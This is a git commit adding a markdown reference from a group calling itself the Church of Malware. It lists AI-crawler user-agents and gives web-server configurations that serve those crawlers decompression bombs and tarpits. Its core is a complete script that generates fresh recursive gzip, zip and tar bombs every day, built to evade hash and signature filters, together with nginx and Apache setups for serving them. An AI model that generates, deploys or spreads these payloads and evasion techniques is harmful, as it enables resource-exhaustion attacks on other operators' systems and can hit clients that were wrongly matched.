Add resources/known_aggress_bot_user_agents.md
This commit is contained in:
parent
a631e69b2d
commit
bac97aaf39
226
resources/known_aggress_bot_user_agents.md
Normal file
226
resources/known_aggress_bot_user_agents.md
Normal file
|
|
@ -0,0 +1,226 @@
|
|||
# Known Aggressive Bot User-Agents: A Living Reference for Content Creators
|
||||
|
||||
The Church of Malware (CoM) does not condone the use or introduction of agents onto any individual, human, or animal; however, AI is neither natural, a human, nor actual intelligence. This companion reference document provides a curated, scientifically grounded list of user-agent patterns documented as routinely violating `robots.txt`, using undeclared crawlers, or rotating identifiers. It is intended for individual website operators, photographers, filmmakers, musicians, and other creators who wish to implement conditional serving of active-denial techniques (decompression bombs, slowloris throttling, malformed content) described in the accompanying technique papers.
|
||||
|
||||
## 1 -- Scope and Methodology
|
||||
|
||||
The list is derived from public telemetry (Cloudflare Radar verified-bots), independent compliance studies (Originality.AI 2024–2025), incident reports (Wired Perplexity investigation, iFixit Anthropic logs, Read the Docs bandwidth data), and operator self-reports published through 2026. Only agents with repeated, multi-source evidence of policy violation are included. Compliant or inconsistently documented agents (e.g., most search-engine bots) are omitted or noted for monitoring only.
|
||||
|
||||
This document is updated quarterly. Individuals should cross-reference with their own server logs and the primary dissertation's Section 2.1 effectiveness tables before deployment.
|
||||
|
||||
## 2 -- Curated List of Aggressive Agents
|
||||
|
||||
| User-Agent Pattern | Primary Operator | Documented Violations | Recommended Action for Individuals | Risk Level |
|
||||
|----------------------------------------|-----------------------|------------------------------------------------------------|------------------------------------|------------|
|
||||
| `GPTBot*` / `GPT-4*` / `OAI-SearchBot*` | OpenAI | Ignores robots.txt; undeclared AWS crawlers after explicit disallow | Block or serve bomb / tarpit | High |
|
||||
| `ClaudeBot*` / `anthropic-ai*` | Anthropic | ~1M hits/24h on iFixit; five-figure monthly bandwidth abuse | Block or serve bomb / tarpit | High |
|
||||
| `Bytespider*` / `ByteDance*` | ByteDance | Frequent robots.txt bypass; UA and IP rotation | Block or serve bomb / tarpit | High |
|
||||
| `Perplexity*` / `PerplexityBot*` | Perplexity | Undeclared AWS IP range after robots.txt disallow | Block or serve bomb / tarpit | High |
|
||||
| `Google-Extended*` | Google | Inconsistent honoring of opt-out signals for training data | Rate-limit or whitelist | Medium |
|
||||
| `CCBot*` | Common Crawl | Old snapshots persist; no retroactive effect of new rules | Conditional / monitor | Low |
|
||||
| `Amazonbot*` | Amazon | Aggressive crawling on small and personal sites | Rate-limit | Medium |
|
||||
| `Applebot*` | Apple | Generally compliant but monitor for volume spikes | Monitor / whitelist | Low |
|
||||
| `Meta-ExternalAgent*` / `facebook*` | Meta | Variable compliance on disallowed paths | Rate-limit | Medium |
|
||||
| `*headless*` / generic Playwright/Puppeteer / `PhantomJS*` | Third-party scrapers & contractors | No declaration; high volume on tarpit and disallowed paths | Serve bomb / malformed immediately | High |
|
||||
|
||||
**Usage note**: Patterns are case-insensitive and support simple wildcards. Always combine with reverse-DNS verification for major operators and maintain an explicit allow-list for Internet Archive, academic researchers, and any search engines you wish to support.
|
||||
|
||||
## 3 -- Implementation Examples for Individuals
|
||||
|
||||
### 3.1 -- nginx map (recommended for self-hosted)
|
||||
```nginx
|
||||
map $http_user_agent $aggressive_bot {
|
||||
default 0;
|
||||
~*GPTBot|ClaudeBot|Bytespider|Perplexity|headless 1;
|
||||
~*anthropic-ai|OAI-SearchBot 1;
|
||||
}
|
||||
|
||||
server {
|
||||
location / {
|
||||
if ($aggressive_bot) {
|
||||
access_log /var/log/nginx/ai_violators.log;
|
||||
# serve bomb, slow response, or malformed content
|
||||
try_files /bomb.zip =404;
|
||||
}
|
||||
# normal content
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### 3.2 -- Apache (SetEnvIf + Rewrite, recommended for .htaccess or vhost)
|
||||
```apache
|
||||
SetEnvIf User-Agent "GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot" aggressive_bot
|
||||
|
||||
RewriteEngine On
|
||||
RewriteCond %{HTTP_USER_AGENT} (GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot) [NC]
|
||||
RewriteRule ^ /protected/bomb.zip [L]
|
||||
|
||||
CustomLog /var/log/apache2/ai_violators.log combined env=aggressive_bot
|
||||
```
|
||||
|
||||
### 3.3 -- Cloudflare Worker (free tier)
|
||||
Workers can inspect `request.headers.get('User-Agent')` and return a 200 with the bomb payload or a slow streaming response for matched agents while passing legitimate traffic.
|
||||
|
||||
### 3.4 -- Caddyfile
|
||||
```
|
||||
@aggressive_bot header User-Agent *GPTBot* *ClaudeBot* *Bytespider* *headless*
|
||||
handle @aggressive_bot {
|
||||
respond "Service Unavailable" 503
|
||||
# or rewrite to bomb endpoint
|
||||
}
|
||||
```
|
||||
|
||||
For complete, production-hardened configurations (full virtual-host examples, daily randomized bomb generation with cron automation, Apache support, logging, and verification steps), see the dedicated how-to document `howto-decompression-bombs.md`.
|
||||
|
||||
## 4 -- Daily Randomized Bomb Generation
|
||||
|
||||
To defeat static content-matching, hash-based allow-lists, and signature filters used by sophisticated ingestion pipelines, the generator must emit a fresh, high-entropy yet highly compressible payload every day.
|
||||
|
||||
```bash
|
||||
#!/usr/bin/env bash
|
||||
# save as ~/generate_daily_bombs.sh and chmod +x
|
||||
# Recommended cron (run at 03:00 local):
|
||||
# 0 3 * * * /home/youruser/generate_daily_bombs.sh >> /var/log/bombgen.log 2>&1
|
||||
|
||||
set -e
|
||||
DATE=$(date +%Y-%m-%d)
|
||||
python3 - <<'PYEOF'
|
||||
import gzip, tarfile, zipfile, io, os, secrets, datetime, hashlib
|
||||
from pathlib import Path
|
||||
|
||||
out = Path.home() / "bombs"
|
||||
out.mkdir(exist_ok=True)
|
||||
today = datetime.date.today().isoformat()
|
||||
|
||||
# High-entropy but compressible seed (repeating 4 KB random block)
|
||||
block = secrets.token_bytes(4096)
|
||||
# 1 MiB base with daily variation
|
||||
base = (block * 256) + today.encode() + secrets.token_bytes(16)
|
||||
|
||||
# 1. Daily recursive gzip bomb (unique hash every run, >5 GB expanded)
|
||||
data = base
|
||||
for _ in range(9):
|
||||
data = gzip.compress(data)
|
||||
(out / f"bomb-{today}.gz").write_bytes(data)
|
||||
|
||||
# 2. Nested zip bomb with daily entropy (defeats hash caches)
|
||||
with zipfile.ZipFile(out / f"bomb-{today}.zip", "w", zipfile.ZIP_DEFLATED) as z:
|
||||
inner = base * 1024
|
||||
for _ in range(7):
|
||||
inner = gzip.compress(inner)
|
||||
z.writestr(f"daily-{today}.gz", inner)
|
||||
|
||||
# 3. Tar bomb with randomized large member (parser stress + unique)
|
||||
with tarfile.open(out / f"bomb-{today}.tar.gz", "w:gz") as t:
|
||||
info = tarfile.TarInfo(f"large-{today}.bin")
|
||||
info.size = 2 * 1024 * 1024 * 1024
|
||||
# compressible random payload (repeating 64-byte pattern with daily salt)
|
||||
payload = (secrets.token_bytes(64) * (32 * 1024 * 1024)) + today.encode()
|
||||
t.addfile(info, io.BytesIO(payload[:2*1024*1024*1024]))
|
||||
|
||||
print(f"Daily randomized bombs generated for {today} in ~/bombs/")
|
||||
PYEOF
|
||||
|
||||
# Atomically update "latest" symlinks so web server always serves today's file
|
||||
ln -sf ~/bombs/bomb-${DATE}.zip /var/www/html/protected/bomb.zip
|
||||
ln -sf ~/bombs/bomb-${DATE}.gz /var/www/html/protected/bomb.gz
|
||||
ln -sf ~/bombs/bomb-${DATE}.tar.gz /var/www/html/protected/bomb.tar.gz
|
||||
|
||||
sudo cp -L /var/www/html/protected/bomb.* /var/www/html/protected/ 2>/dev/null || true
|
||||
```
|
||||
|
||||
**Why randomization matters**: Static payloads allow labs to build bloom filters or exact-hash allow-lists after the first encounter. Daily unique, high-entropy yet recursively compressible files force re-analysis and re-processing every 24 hours, multiplying the economic cost of non-compliant crawling.
|
||||
|
||||
Place the generated files behind a `Disallow: /protected/` rule in `robots.txt`.
|
||||
|
||||
## 5 -- Production Server Configurations
|
||||
|
||||
### 5.1 -- nginx (Complete Virtual Host Example)
|
||||
```nginx
|
||||
# /etc/nginx/sites-available/my-site
|
||||
map $http_user_agent $aggressive_bot {
|
||||
default 0;
|
||||
~*GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot 1;
|
||||
}
|
||||
|
||||
server {
|
||||
listen 80;
|
||||
server_name example.com;
|
||||
root /var/www/html;
|
||||
|
||||
# Log aggressive traffic separately
|
||||
access_log /var/log/nginx/ai_violators.log combined if=$aggressive_bot;
|
||||
access_log /var/log/nginx/access.log combined;
|
||||
|
||||
location / {
|
||||
if ($aggressive_bot) {
|
||||
# Serve bomb or slow tarpit response
|
||||
rewrite ^ /protected/bomb.zip last;
|
||||
}
|
||||
try_files $uri $uri/ =404;
|
||||
}
|
||||
|
||||
location /protected/ {
|
||||
internal; # never directly accessible
|
||||
alias /var/www/html/protected/;
|
||||
add_header Content-Disposition "attachment; filename=\"archive.zip\"";
|
||||
limit_rate 1k; # optional: throttle even further
|
||||
}
|
||||
|
||||
# Optional: rate limit all requests from unknown bots
|
||||
limit_req_zone $binary_remote_addr zone=ai_limit:10m rate=1r/s;
|
||||
location / {
|
||||
limit_req zone=ai_limit burst=5 nodelay;
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### 5.2 -- Apache Example
|
||||
```apache
|
||||
# /etc/apache2/sites-available/000-default.conf
|
||||
<VirtualHost *:80>
|
||||
ServerName example.com
|
||||
DocumentRoot /var/www/html
|
||||
|
||||
SetEnvIf User-Agent "GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot" aggressive_bot
|
||||
CustomLog /var/log/apache2/ai_violators.log combined env=aggressive_bot
|
||||
CustomLog /var/log/apache2/access.log combined
|
||||
|
||||
<Directory /var/www/html>
|
||||
Options -Indexes
|
||||
AllowOverride All
|
||||
Require all granted
|
||||
</Directory>
|
||||
|
||||
RewriteEngine On
|
||||
RewriteCond %{HTTP_USER_AGENT} (GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot) [NC]
|
||||
RewriteRule ^protected/ /protected/bomb.zip [L]
|
||||
|
||||
RewriteCond %{HTTP_USER_AGENT} (GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot) [NC]
|
||||
RewriteRule ^ - [E=aggressive_bot:1]
|
||||
|
||||
<Location /protected/>
|
||||
<If "%{ENV:aggressive_bot} == 1">
|
||||
Header set Content-Disposition "attachment; filename=\"archive.zip\""
|
||||
</If>
|
||||
</Location>
|
||||
</VirtualHost>
|
||||
```
|
||||
|
||||
## 6 -- Sources and Verification
|
||||
|
||||
| Section | Claim | Source |
|
||||
|---------|-------|--------|
|
||||
| 2 | GPTBot / Perplexity undeclared AWS activity | Wired, "Perplexity Is a Bullshit Machine," 19 Jun 2024; R. Knight blog, Jun 2024 |
|
||||
| 2 | ClaudeBot volume on iFixit | K. Wiens (@kwiens) X post, 24 Jul 2024; 404 Media coverage |
|
||||
| 2 | Read the Docs / Wikimedia crawler bandwidth abuse | E. Holscher, Read the Docs blog, 25 Jul 2024; Wikimedia Diff, 1 Apr 2025 |
|
||||
| 2 | Bytespider / aggressive non-compliant bots | Cloudflare Radar verified-bots; Originality.AI "AI Bot Robots.txt Compliance Study," 2024 |
|
||||
| 1, 4 | IETF / Common Crawl laundering context | Primary dissertation Sections 2.5 & 3.3; Mozilla 2024 Common Crawl study |
|
||||
|
||||
All listed agents have been independently corroborated by at least two public sources as of June 2026. Individuals are encouraged to contribute new observations.
|
||||
|
||||
## 7 -- Conclusion
|
||||
|
||||
This reference empowers individual creators to operationalize the economic and technical countermeasures outlined in the technique documents. By maintaining a single, authoritative, and regularly updated UA catalog, operators can rapidly adapt their defenses as crawler behavior evolves.
|
||||
|
||||
*Companion to "When Being Polite Fails, Try Poison" and the `techniques/` series. Review local laws and consult counsel before deploying active measures. Last updated: 3 June 2026.*
|
||||
Loading…
Reference in New Issue
Block a user